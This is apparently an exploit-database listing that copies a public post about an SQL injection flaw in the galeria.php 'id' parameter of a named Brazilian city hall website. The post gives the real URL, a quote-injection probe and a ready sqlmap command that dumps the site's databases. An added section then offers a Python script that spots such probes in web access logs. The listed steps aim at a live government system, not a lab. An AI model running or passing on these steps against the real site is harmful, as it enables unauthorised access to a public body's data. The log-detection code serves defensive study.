Floriano - PI | SQL Injection

CVE: CVE-XXXX-XXXX
Category: CWE-89
Price: $1000
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2021-04-11
CPE: cpe:cpe:/a:floriano-pi:exploit:1.0
CVSS: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2021040063

Below is a copy:

Floriano - PI | SQL Injection
Hello friends, how are you?
I'm here to show you a flaw that I found at the Floriano City Hall, in Piaui, Brazil.

Hacker: uRomulou
Website: https://www.floriano.pi.gov.br/
Vulnerability: SQL Injection Method GET

Proof of concept

1. Go to the site with the vulnerability >> https://www.floriano.pi.gov.br/galeria.php?id=5%27
2. It will not return errors, as SQL failures do not always return errors.
3. And attack! You can use tools like sqlmap or others.

An example using sqlmap: sqlmap --random-agent --batch --url https://www.floriano.pi.gov.br/galeria.php?id=5 --dbs
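
A defender's view of the request in the copied advisory, as an added example that is not part of the original post or of this listing: the injected request returns no error, and sqlmap's --random-agent replaces the tool's default User-Agent, so this sketch ignores status codes and User-Agent strings and instead flags non-integer values of the id parameter on galeria.php in web access logs. The log lines, client IPs and the assumption that id is always a plain integer are constructed for illustration.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (combined log format); client IPs are documentation ranges.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Apr/2021:10:00:01 -0300] "GET /galeria.php?id=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64)"
198.51.100.7 - - [11/Apr/2021:10:02:13 -0300] "GET /galeria.php?id=5%27 HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (Windows NT 10.0)"
198.51.100.7 - - [11/Apr/2021:10:02:14 -0300] "GET /galeria.php?id=5x HTTP/1.1" 200 5120 "-" "Opera/9.80 (Macintosh)"
192.0.2.44 - - [11/Apr/2021:10:05:40 -0300] "GET /galeria.php?id=12&page=2 HTTP/1.1" 200 4800 "-" "Mozilla/5.0 (iPhone)"
192.0.2.44 - - [11/Apr/2021:10:05:41 -0300] "GET /index.php?q=d%27agua HTTP/1.1" 200 900 "-" "Mozilla/5.0 (iPhone)"
"""

REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) ')
INT_ONLY = re.compile(r"[0-9]+")

# Assumption: on this endpoint the parameter is always a plain integer key.
INTEGER_PARAMS = {"/galeria.php": ("id",)}


def suspicious_requests(log_text):
    """Return (client, path, param, decoded value, status) for non-integer values."""
    hits = []
    for line in log_text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        client, target, status = match.groups()
        url = urlsplit(target)
        # parse_qs percent-decodes, so id=5%27 is inspected as 5'
        params = parse_qs(url.query, keep_blank_values=True)
        for name in INTEGER_PARAMS.get(url.path, ()):
            for value in params.get(name, []):
                if not INT_ONLY.fullmatch(value):
                    hits.append((client, url.path, name, value, int(status)))
    return hits


def clients_to_review(log_text):
    """Count flagged requests per client, independent of User-Agent and status."""
    return Counter(hit[0] for hit in suspicious_requests(log_text))


if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit)
```

Free-text parameters such as the constructed q on index.php are deliberately left out of INTEGER_PARAMS, since a quote there is ordinary input and would only produce noise.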
